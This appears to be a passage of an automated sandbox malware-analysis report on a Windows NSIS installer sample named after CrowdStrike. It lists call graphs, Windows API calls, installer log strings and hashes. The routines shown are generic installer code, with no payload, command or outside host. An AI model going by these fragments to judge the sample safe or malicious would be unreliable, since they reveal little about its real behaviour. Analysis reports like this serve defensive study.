5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4061 4021b5 4062 40145c 18 API calls 4061->4062 4063 4021bb 4062->4063 4064 40145c 18 API calls 4063->4064 4065 4021c4 4064->4065 4066 40145c 18 API calls 4065->4066 4067 4021cd 4066->4067 4068 40145c 18 API calls 4067->4068 4069 4021d6 4068->4069 4070 404f72 25 API calls 4069->4070 4071 4021e2 ShellExecuteW 4070->4071 4072 40221b 4071->4072 4073 40220d 4071->4073 4075 4062a3 11 API calls 4072->4075 4074 4062a3 11 API calls 4073->4074 4074->4072 4076 402230 4075->4076 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 5172 404201 5163->5172 5168 40410e 5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 EnableWindow 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 EnableWindow 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4077 401eb9 4078 401f24 4077->4078 4079 401ec6 4077->4079 4080 401f53 GlobalAlloc 4078->4080 4081 401f28 4078->4081 4082 401ed5 4079->4082 4089 401ef7 4079->4089 4083 406805 18 API calls 4080->4083 4088 4062a3 11 API calls 4081->4088 4093 401f36 4081->4093 4084 4062a3 11 API calls 4082->4084 4087 401f46 4083->4087 4085 401ee2 4084->4085 4090 402708 4085->4090 4095 406805 18 API calls 4085->4095 4087->4090 4091 402387 GlobalFree 4087->4091 4088->4093 4099 406009 lstrcpynW 4089->4099 4091->4090 4101 406009 lstrcpynW 4093->4101 4094 401f06 4100 406009 lstrcpynW 4094->4100 4095->4085 4097 401f15 4102 406009 lstrcpynW 4097->4102 4099->4094 4100->4097 4101->4087 4102->4090 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 5202->5205 5206 40743a GlobalFree 5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

                                                                        Executed Functions

                                                                        Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 146 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 153 403923-403937 call 405d06 CharNextW 146->153 154 40391b-40391e 146->154 157 4039ca-4039d0 153->157 154->153 158 4039d6 157->158 159 40393c-403942 157->159 160 4039f5-403a0d GetTempPathW call 4037cc 158->160 161 403944-40394a 159->161 162 40394c-403950 159->162 169 403a33-403a4d DeleteFileW call 403587 160->169 170 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 160->170 161->161 161->162 164 403952-403957 162->164 165 403958-40395c 162->165 164->165 167 4039b8-4039c5 call 405d06 165->167 168 40395e-403965 165->168 167->157 183 4039c7 167->183 172 403967-40396e 168->172 173 40397a-40398c call 403800 168->173 186 403acc-403adb call 403859 OleUninitialize 169->186 187 403a4f-403a55 169->187 170->169 170->186 174 403970-403973 172->174 175 403975 172->175 184 4039a1-4039b6 call 403800 173->184 185 40398e-403995 173->185 174->173 174->175 175->173 183->157 184->167 202 4039d8-4039f0 call 407d6e call 406009 184->202 189 403997-40399a 185->189 190 40399c 185->190 200 403ae1-403af1 call 405ca0 ExitProcess 186->200 201 403bce-403bd4 186->201 192 403ab5-403abc call 40592c 187->192 193 403a57-403a60 call 405d06 187->193 189->184 189->190 190->184 199 403ac1-403ac7 call 4060e7 192->199 203 403a79-403a7b 193->203 199->186 206 403c51-403c59 201->206 207 403bd6-403bf3 call 4062fc * 3 201->207 202->160 211 403a62-403a74 call 403800 203->211 212 403a7d-403a87 203->212 213 403c5b 206->213 214 403c5f 206->214 238 403bf5-403bf7 207->238 239 403c3d-403c48 ExitWindowsEx 207->239 211->212 225 403a76 211->225 219 403af7-403b11 lstrcatW lstrcmpiW 212->219 220 403a89-403a99 call 40677e 212->220 213->214 219->186 224 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 219->224 220->186 231 403a9b-403ab1 call 406009 * 2 220->231 228 403b36-403b56 call 406009 * 2 224->228 229 403b2b-403b31 call 406009 224->229 225->203 245 403b5b-403b77 call 406805 DeleteFileW 228->245 229->228 231->192 238->239 243 403bf9-403bfb 238->243 239->206 242 403c4a-403c4c call 40141d 239->242 242->206 243->239 247 403bfd-403c0f GetCurrentProcess 243->247 253 403bb8-403bc0 245->253 254 403b79-403b89 CopyFileW 245->254 247->239 252 403c11-403c33 247->252 252->239 253->245 255 403bc2-403bc9 call 406c68 253->255 254->253 256 403b8b-403bab call 406c68 call 406805 call 405c3f 254->256 255->186 256->253 266 403bad-403bb4 CloseHandle 256->266 266->253
                                                                        APIs
                                                                        • #17.COMCTL32 ref: 004038A2
                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                        • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                        • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                        • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                        • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                        • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                        • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                        • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                        • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                        • OleUninitialize.OLE32(?), ref: 00403AD1
                                                                        • ExitProcess.KERNEL32 ref: 00403AF1
                                                                        • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                        • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                        • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                        • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                        • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                        • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                        • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                        • API String ID: 2435955865-239407132
                                                                        • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                        • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                        • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                        • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                        Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 625 4074bb-4074c0 626 4074c2-4074ef 625->626 627 40752f-407547 625->627 629 4074f1-4074f4 626->629 630 4074f6-4074fa 626->630 628 407aeb-407aff 627->628 634 407b01-407b17 628->634 635 407b19-407b2c 628->635 631 407506-407509 629->631 632 407502 630->632 633 4074fc-407500 630->633 636 407527-40752a 631->636 637 40750b-407514 631->637 632->631 633->631 638 407b33-407b3a 634->638 635->638 641 4076f6-407713 636->641 642 407516 637->642 643 407519-407525 637->643 639 407b61-407c68 638->639 640 407b3c-407b40 638->640 656 407350 639->656 657 407cec 639->657 645 407b46-407b5e 640->645 646 407ccd-407cd4 640->646 648 407715-407729 641->648 649 40772b-40773e 641->649 642->643 644 407589-4075b6 643->644 652 4075d2-4075ec 644->652 653 4075b8-4075d0 644->653 645->639 650 407cdd-407cea 646->650 654 407741-40774b 648->654 649->654 655 407cef-407cf6 650->655 658 4075f0-4075fa 652->658 653->658 659 40774d 654->659 660 4076ee-4076f4 654->660 661 407357-40735b 656->661 662 40749b-4074b6 656->662 663 40746d-407471 656->663 664 4073ff-407403 656->664 657->655 667 407600 658->667 668 407571-407577 658->668 669 407845-4078a1 659->669 670 4076c9-4076cd 659->670 660->641 666 407692-40769c 660->666 661->650 671 407361-40736e 661->671 662->628 676 407c76-407c7d 663->676 677 407477-40748b 663->677 682 407409-407420 664->682 683 407c6d-407c74 664->683 672 4076a2-4076c4 666->672 673 407c9a-407ca1 666->673 685 407556-40756e 667->685 686 407c7f-407c86 667->686 674 40762a-407630 668->674 675 40757d-407583 668->675 669->628 678 407c91-407c98 670->678 679 4076d3-4076eb 670->679 671->657 687 407374-4073ba 671->687 672->669 673->650 688 40768e 674->688 689 407632-40764f 674->689 675->644 675->688 676->650 684 40748e-407496 677->684 678->650 679->660 690 407423-407427 682->690 683->650 684->663 694 407498 684->694 685->668 686->650 692 4073e2-4073e4 687->692 693 4073bc-4073c0 687->693 688->666 695 407651-407665 689->695 696 407667-40767a 689->696 690->664 691 407429-40742f 690->691 698 407431-407438 691->698 699 407459-40746b 691->699 702 4073f5-4073fd 692->702 703 4073e6-4073f3 692->703 700 4073c2-4073c5 GlobalFree 693->700 701 4073cb-4073d9 GlobalAlloc 693->701 694->662 697 40767d-407687 695->697 696->697 697->674 704 407689 697->704 705 407443-407453 GlobalAlloc 698->705 706 40743a-40743d GlobalFree 698->706 699->684 700->701 701->657 707 4073df 701->707 702->690 703->702 703->703 709 407c88-407c8f 704->709 710 40760f-407627 704->710 705->657 705->699 706->705 707->692 709->650 710->674
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                        • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                        • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                        • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                        Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                        • String ID:
                                                                        • API String ID: 310444273-0
                                                                        • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                        • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                        • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                        • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                        Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                        • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                        • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                        • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                        • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                        Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 26 4030ee-4030f2 1->26 4 401601-401611 call 4062a3 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 2->8 9 401650-401668 call 40137e call 4062a3 call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062a3 call 405d59 2->10 11 401672-401686 call 40145c call 4062a3 2->11 12 401693-4016ac call 401446 call 4062a3 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062a3 call 404f72 2->14 15 4016d6-4016db 2->15 16 401736-4030de 2->16 17 401897-4018a7 call 40145c call 4062d5 2->17 18 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062a3 SetForegroundWindow 2->20 4->26 30 401751-401755 ShowWindow 5->30 31 401758-40175f 5->31 65 4019a3-4019a8 6->65 66 40197f-401984 6->66 7->1 58 4019ec-4019f8 7->58 8->1 83 40179a-4017a6 call 4062a3 8->83 92 40166d 9->92 105 401864-40186c 10->105 106 4017de-4017fc call 405d06 CreateDirectoryW 10->106 84 401689-40168e call 404f72 11->84 89 4016b1-4016b8 Sleep 12->89 90 4016ae-4016b0 12->90 13->26 27 401632-401637 14->27 24 401702-401710 15->24 25 4016dd-4016fd call 401446 15->25 16->1 60 4030de call 405f51 16->60 85 4018c2-4018d6 call 4062a3 17->85 86 4018a9-4018bd call 4062a3 17->86 113 401912-401919 18->113 114 40191e-401921 18->114 19->27 28 401647-40164e PostQuitMessage 19->28 20->1 24->1 25->1 27->26 28->27 30->31 31->1 49 401765-401769 ShowWindow 31->49 49->1 58->1 60->1 69 4019af-4019b2 65->69 66->69 76 401986-401989 66->76 69->1 79 4019b8-4019c5 GetShortPathNameW 69->79 76->69 87 40198b-401993 call 4062d5 76->87 79->1 100 4017ab-4017ac 83->100 84->1 85->26 86->26 87->65 110 401995-4019a1 call 406009 87->110 89->1 90->89 92->26 100->1 108 401890-401892 105->108 109 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 105->109 118 401846-40184e call 4062a3 106->118 119 4017fe-401809 GetLastError 106->119 108->84 109->1 110->69 113->84 120 401923-40192b call 4062d5 114->120 121 40194a-401950 114->121 133 401853-401854 118->133 124 401827-401832 GetFileAttributesW 119->124 125 40180b-401825 GetLastError call 4062a3 119->125 120->121 139 40192d-401948 call 406c68 call 404f72 120->139 129 401957-40195d call 4062a3 121->129 131 401834-401844 call 4062a3 124->131 132 401855-40185e 124->132 125->132 129->100 131->133 132->105 132->106 133->132 139->129
                                                                        APIs
                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                        • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                        Strings
                                                                        • Rename: %s, xrefs: 004018F8
                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                        • detailprint: %s, xrefs: 00401679
                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                        • Jump: %d, xrefs: 00401602
                                                                        • Sleep(%d), xrefs: 0040169D
                                                                        • Call: %d, xrefs: 0040165A
                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                        • BringToFront, xrefs: 004016BD
                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                        • API String ID: 2872004960-3619442763
                                                                        • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                        • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                        • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                        • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                        Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
